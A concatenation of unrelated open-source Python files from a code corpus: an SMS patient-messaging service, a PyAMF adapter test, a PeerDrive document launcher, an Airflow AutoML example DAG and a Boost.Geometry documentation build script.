Sends the initial SMS to new* patients at a pre-defined client time.
*New patients are those that have recently been added to the
client's database but are not yet known to the service.
Note: this is REQUIRED; otherwise 'respond' and the other services
fail because database errors are thrown (understandably).
"""
from datetime import datetime
current_time = str(datetime.now().time())[0:5]
# Send the message to new patients at the defined time.
if current_time == self.config['initialQuestion']['time']:
for number in self.__new_patients():
message = self.messenger.initial_message()
self.sms_service.send(number, message)
self.__create_new_patient(number)
self.__save_message(number, message, 'sent')
def respond(self, patient_response):
"""
Respond to new SMS when it is received via a POST request.
Args:
patient_response (dict): Contains the number and message sent to
the service by a patient.
Returns:
response (XML): twilio formatted response.
"""
number = patient_response['number']
patient_message = patient_response['message']
# Generate a reflective summary based on the patient's response.
summary = self.messenger.summary(patient_message)
# TODO: Fix this with the system set time (i.e. UTC)
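# Unix timestamp for 24 hours ago (not a true midnight), used to find
# the messages sent since last night.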
midnight = int(datetime.today().strftime("%s")) - 24*60*60
# The number of questions sent since last night.
_questions = db.session.query(models.Message).filter(
models.Message.mobile == number,
models.Message.status == 'sent',
models.Message.timestamp >= midnight).all()
all_sent = [item.message for item in _questions]
# The number of OEQ sent since last night.
num_oeq = len([i for i in self.config['questions'] if i in all_sent])
print 'Number OEQ sent since last night was: %s' % str(num_oeq)
response = None
# Do not send a response if initial daily conversation not started.
if num_oeq >= 1:
print 'The last sms sent was: %s' % all_sent[-1]
if all_sent[-1] in self.config['questions']:
print 'Last message sent was an OEQ. Sending a RS to patient.'
response = summary
else:
print 'Inside the else..'
if (num_oeq >= int(self.config['limit'])): # True: OEQ >= LIMIT
print 'Inside the else... in the if...'
if self.config['endQuestion'] not in all_sent:
print 'Sending the conversation closer as limit met.'
response = self.config['endQuestion']
else:
print 'Message received was response to a RS. Sending OEQ.'
response = self.__select_question(number)
if response:
self.__save_message(number, patient_message, 'received')
self.__save_message(number, response, 'sent')
print 'The response (%s) has been saved to the database.' % response
return self.sms_service.reply(response)
else:
print 'No response was created.'
return '' # Prevents a 500 error code returned to POST.
def send_initial_question_to_all(self):
"""
Sends a question to all patients at a pre-defined day and time.
"""
known_patients = [item.mobile for item in
db.session.query(models.Patient.mobile).all()]
from datetime import datetime
print "Checking to see if open-ended question should be sent."
isDay = datetime.now().strftime("%A") in self.config["daysToSend"]
isTime = str(datetime.now().time())[0:5] == self.config["sendTime"]
if isDay and isTime:
for number in known_patients:
message = self.__select_question(number)
print "OEQ (%s) to patient (%s)." % (message, number)
self.__save_message(number, message, 'sent')
self.sms_service.send(number, message)
def __select_question(self, number):
"""
Randomly select a client-defined open-ended question that has not been
previously sent. If all have been sent, select any one at random.
Args:
number (str): The mobile number of the patient.
Returns:
str: An open-ended question to ask the patient.
"""
questions = self.config['questions']
sent_questions = [item.message for item in db.session.query(
models.Message).filter(models.Message.mobile == number).all()]
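# Config questions that have never been sent to this patient.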
unsent_questions = list(set(questions).difference(sent_questions))
# TODO: Select most important question based on client's situation
import random
if unsent_questions:
print "Sending a message that HAS NOT been previously sent."
message = random.choice(unsent_questions)
else:
print "Sending a message that HAS been previously sent."
message = random.choice(questions)
return message
def __load_config_file(self):
"""
Loads the contents of the client-defined config file into a json object.
Returns:
json: A json object of the user-defined config file.
"""
import json
from flask import current_app
config_file = current_app.config['PROJECT_ROOT'] + '/sris/config/' + \
current_app.config['CLIENT_NAME'] + '.json'
with open(config_file) as json_settings:
return json.load(json_settings)
def __new_patients(self):
"""
Checks to see if any new patients have been added to the client DB.
Returns:
list: Mobile numbers the client knows & the service does not.
"""
# ALL numbers obtained from the client.
client_numbers = db.session.query(models.Patient.mobile).all()
# The numbers the service has to date.
service_numbers = db.session.query(models.User.mobile).all()
# The numbers the client has, but the service does not.
numbers = set(client_numbers).difference(service_numbers)
print 'There was %s new patients' % str(len(numbers))
# Convert SQLAlchemy KeyedTuple to ordinary list.
return [item.mobile for item in numbers]
def __create_new_patient(self, number):
"""
Adds the patient to the service database.
Args:
number (str): The mobile number of the patient.
"""
db.session.add(models.User(mobile=number))
db.session.commit()
def __save_message(self, number, message, status):
"""
Save the SMS message (sent or received) to the service database.
Args:
number (str): The mobile number of the patient.
message (str): The SMS message content.
status (str): The status of the message, e.g. 'sent' or 'received'.
"""
db.session.add(models.Message(mobile=number, message=message,
status=status))
db.session.commit()
| mit | -7,210,275,371,339,341,000 | 40.430851 | 80 | 0.594813 | false |
johnmee/plugin.video.catchuptv.au.ten | resources/lib/pyamf/tests/test_adapters.py | 32 | 1661 | # Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
Tests for the adapters module.
@since: 0.3.1
"""
import os
import sys
from pyamf import adapters
from pyamf.tests import util
from pyamf.tests.test_imports import ImportsTestCase
class AdapterHelperTestCase(ImportsTestCase):
def setUp(self):
ImportsTestCase.setUp(self)
self.old_env = os.environ.copy()
self.mods = sys.modules.copy()
self.path = os.path.join(os.path.dirname(__file__), 'imports')
sys.path.append(self.path)
def tearDown(self):
ImportsTestCase.tearDown(self)
util.replace_dict(os.environ, self.old_env)
util.replace_dict(sys.modules, self.mods)
sys.path.remove(self.path)
def test_basic(self):
class Foo(object):
def __call__(self, *args, **kwargs):
pass
def bar(*args, **kargs):
pass
self.assertRaises(TypeError, adapters.register_adapter, 'foo', 1)
self.assertRaises(TypeError, adapters.register_adapter, 'foo', 'asdf')
adapters.register_adapter('foo', Foo())
adapters.register_adapter('foo', bar)
adapters.register_adapter('foo', lambda x: x)
def test_import(self):
self.imported = False
def x(mod):
self.imported = True
self.spam = mod
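# Registering the adapter means x() is called as soon as the 'spam'
# module is imported below.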
adapters.register_adapter('spam', x)
import spam
self.assertTrue(self.imported)
self.assertEqual(self.spam, spam)
def test_get_adapter(self):
from pyamf.adapters import _decimal
self.assertTrue(adapters.get_adapter('decimal') is _decimal)
| mit | 404,746,451,271,306,700 | 24.166667 | 78 | 0.624323 | false |
peerdrive/peerdrive | client/peerdrive/gui/utils.py | 1 | 1601 | # vim: set fileencoding=utf-8 :
#
# PeerDrive
# Copyright (C) 2011 Jan Klötzke <jan DOT kloetzke AT freenet DOT de>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from PyQt4 import QtCore
import sys, subprocess
from ..connector import Connector
from ..registry import Registry
def showDocument(link, executable=None, referrer=None):
args = [str(link)]
if referrer:
args.append('--referrer')
args.append(str(referrer))
if not executable:
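# No viewer given: look up the document's type and fall back to the
# first executable registered for it.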
link.update()
rev = link.rev()
uti = Connector().stat(rev).type()
executable = Registry().getExecutables(uti)[0]
if executable:
if sys.platform == "win32":
subprocess.Popen([executable] + args, shell=True)
else:
executable = './' + executable
QtCore.QProcess.startDetached(executable, args, '.')
def showProperties(link):
args = [str(link)]
if sys.platform == "win32":
subprocess.Popen(['properties.py'] + args, shell=True)
else:
QtCore.QProcess.startDetached('./properties.py', args, '.')
| gpl-3.0 | -305,702,415,117,508,350 | 29.769231 | 71 | 0.72625 | false |
Acehaidrey/incubator-airflow | airflow/providers/google/cloud/example_dags/example_automl_nl_text_classification.py | 7 | 3351 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example Airflow DAG that uses Google AutoML services.
"""
import os
from airflow import models
from airflow.providers.google.cloud.hooks.automl import CloudAutoMLHook
from airflow.providers.google.cloud.operators.automl import (
AutoMLCreateDatasetOperator,
AutoMLDeleteDatasetOperator,
AutoMLDeleteModelOperator,
AutoMLImportDataOperator,
AutoMLTrainModelOperator,
)
from airflow.utils.dates import days_ago
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "your-project-id")
GCP_AUTOML_LOCATION = os.environ.get("GCP_AUTOML_LOCATION", "us-central1")
GCP_AUTOML_TEXT_CLS_BUCKET = os.environ.get("GCP_AUTOML_TEXT_CLS_BUCKET", "gs://")
# Example values
DATASET_ID = ""
# Example model
MODEL = {
"display_name": "auto_model_1",
"dataset_id": DATASET_ID,
"text_classification_model_metadata": {},
}
# Example dataset
DATASET = {
"display_name": "test_text_cls_dataset",
"text_classification_dataset_metadata": {"classification_type": "MULTICLASS"},
}
IMPORT_INPUT_CONFIG = {"gcs_source": {"input_uris": [GCP_AUTOML_TEXT_CLS_BUCKET]}}
extract_object_id = CloudAutoMLHook.extract_object_id
# Example DAG for AutoML Natural Language Text Classification
with models.DAG(
"example_automl_text_cls",
schedule_interval=None, # Override to match your needs
start_date=days_ago(1),
tags=['example'],
) as example_dag:
create_dataset_task = AutoMLCreateDatasetOperator(
task_id="create_dataset_task", dataset=DATASET, location=GCP_AUTOML_LOCATION
)
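# Jinja-templated XCom pull; the dataset id is resolved at runtime from
# the output of create_dataset_task.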
dataset_id = '{{ task_instance.xcom_pull("create_dataset_task", key="dataset_id") }}'
import_dataset_task = AutoMLImportDataOperator(
task_id="import_dataset_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
input_config=IMPORT_INPUT_CONFIG,
)
MODEL["dataset_id"] = dataset_id
create_model = AutoMLTrainModelOperator(task_id="create_model", model=MODEL, location=GCP_AUTOML_LOCATION)
model_id = "{{ task_instance.xcom_pull('create_model', key='model_id') }}"
delete_model_task = AutoMLDeleteModelOperator(
task_id="delete_model_task",
model_id=model_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
delete_datasets_task = AutoMLDeleteDatasetOperator(
task_id="delete_datasets_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
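# Create and import the dataset before training; tear down the model and
# the dataset afterwards.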
create_dataset_task >> import_dataset_task >> create_model >> delete_model_task >> delete_datasets_task
| apache-2.0 | -797,317,752,486,780,700 | 32.848485 | 110 | 0.716801 | false |
gnu3ra/SCC15HPCRepast | INSTALLATION/boost_1_54_0/libs/geometry/doc/make_qbk.py | 3 | 5284 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# ===========================================================================
# Copyright (c) 2007-2012 Barend Gehrels, Amsterdam, the Netherlands.
# Copyright (c) 2008-2012 Bruno Lalande, Paris, France.
# Copyright (c) 2009-2012 Mateusz Loskot ([email protected]), London, UK
#
# Use, modification and distribution is subject to the Boost Software License,
# Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# ============================================================================
import os, sys
os.chdir(os.path.dirname(sys.argv[0]))
if 'DOXYGEN' in os.environ:
doxygen_cmd = os.environ['DOXYGEN']
else:
doxygen_cmd = 'doxygen'
if 'DOXYGEN_XML2QBK' in os.environ:
doxygen_xml2qbk_cmd = os.environ['DOXYGEN_XML2QBK']
else:
doxygen_xml2qbk_cmd = 'doxygen_xml2qbk'
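# Command template for doxygen_xml2qbk; the two %s placeholders take the
# Doxygen XML name and the output .qbk file name.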
cmd = doxygen_xml2qbk_cmd
cmd = cmd + " --xml doxy/doxygen_output/xml/%s.xml"
cmd = cmd + " --start_include boost/geometry/"
cmd = cmd + " --convenience_header_path ../../../boost/geometry/"
cmd = cmd + " --convenience_headers geometry.hpp,geometries/geometries.hpp,multi/multi.hpp"
cmd = cmd + " --skip_namespace boost::geometry::"
cmd = cmd + " --copyright src/copyright_block.qbk"
cmd = cmd + " > generated/%s.qbk"
def call_doxygen():
os.chdir("doxy");
os.system(doxygen_cmd)
os.chdir("..")
def group_to_quickbook(section):
os.system(cmd % ("group__" + section.replace("_", "__"), section))
def model_to_quickbook(section):
os.system(cmd % ("classboost_1_1geometry_1_1model_1_1" + section.replace("_", "__"), section))
def model_to_quickbook2(classname, section):
os.system(cmd % ("classboost_1_1geometry_1_1model_1_1" + classname, section))
def struct_to_quickbook(section):
os.system(cmd % ("structboost_1_1geometry_1_1" + section.replace("_", "__"), section))
def class_to_quickbook(section):
os.system(cmd % ("classboost_1_1geometry_1_1" + section.replace("_", "__"), section))
def strategy_to_quickbook(section):
p = section.find("::")
ns = section[:p]
strategy = section[p+2:]
os.system(cmd % ("classboost_1_1geometry_1_1strategy_1_1"
+ ns.replace("_", "__") + "_1_1" + strategy.replace("_", "__"),
ns + "_" + strategy))
def cs_to_quickbook(section):
os.system(cmd % ("structboost_1_1geometry_1_1cs_1_1" + section.replace("_", "__"), section))
call_doxygen()
algorithms = ["append", "assign", "make", "clear"
, "area", "buffer", "centroid", "convert", "correct", "covered_by"
, "convex_hull", "difference", "disjoint", "distance"
, "envelope", "equals", "expand", "for_each", "intersection", "intersects"
, "length", "num_geometries", "num_interior_rings", "num_points"
, "overlaps", "perimeter", "reverse", "simplify", "sym_difference"
, "touches", "transform", "union", "unique", "within"]
access_functions = ["get", "set", "exterior_ring", "interior_rings"
, "num_points", "num_interior_rings", "num_geometries"]
coordinate_systems = ["cartesian", "geographic", "polar", "spherical", "spherical_equatorial"]
core = ["closure", "coordinate_system", "coordinate_type", "cs_tag"
, "dimension", "exception", "interior_type"
, "degree", "radian"
, "is_radian", "point_order"
, "point_type", "ring_type", "tag", "tag_cast" ]
exceptions = ["exception", "centroid_exception"];
iterators = ["circular_iterator", "closing_iterator"
, "ever_circling_iterator"]
models = ["point", "linestring", "box"
, "polygon", "segment", "ring"
, "multi_linestring", "multi_point", "multi_polygon", "referring_segment"]
strategies = ["distance::pythagoras", "distance::haversine"
, "distance::cross_track", "distance::projected_point"
, "within::winding", "within::franklin", "within::crossings_multiply"
, "area::surveyor", "area::huiller"
, "centroid::bashein_detmer", "centroid::average"
, "convex_hull::graham_andrew"
, "simplify::douglas_peucker"
, "side::side_by_triangle", "side::side_by_cross_track", "side::spherical_side_formula"
, "transform::inverse_transformer", "transform::map_transformer"
, "transform::rotate_transformer", "transform::scale_transformer"
, "transform::translate_transformer", "transform::ublas_transformer"
]
views = ["box_view", "segment_view"
, "closeable_view", "reversible_view", "identity_view"]
for i in algorithms:
group_to_quickbook(i)
for i in access_functions:
group_to_quickbook(i)
for i in coordinate_systems:
cs_to_quickbook(i)
for i in core:
struct_to_quickbook(i)
for i in exceptions:
class_to_quickbook(i)
for i in iterators:
struct_to_quickbook(i)
for i in models:
model_to_quickbook(i)
for i in strategies:
strategy_to_quickbook(i)
for i in views:
struct_to_quickbook(i)
model_to_quickbook2("d2_1_1point__xy", "point_xy")
group_to_quickbook("arithmetic")
group_to_quickbook("enum")
group_to_quickbook("register")
group_to_quickbook("svg")
class_to_quickbook("svg_mapper")
group_to_quickbook("wkt")
os.chdir("index")
execfile("make_qbk.py")
os.chdir("..")
# Use either bjam or b2 or ../../../b2 (the last should be done on Release branch)
os.system("bjam")
| bsd-3-clause | -2,682,349,740,340,878,000 | 32.232704 | 98 | 0.631529 | false |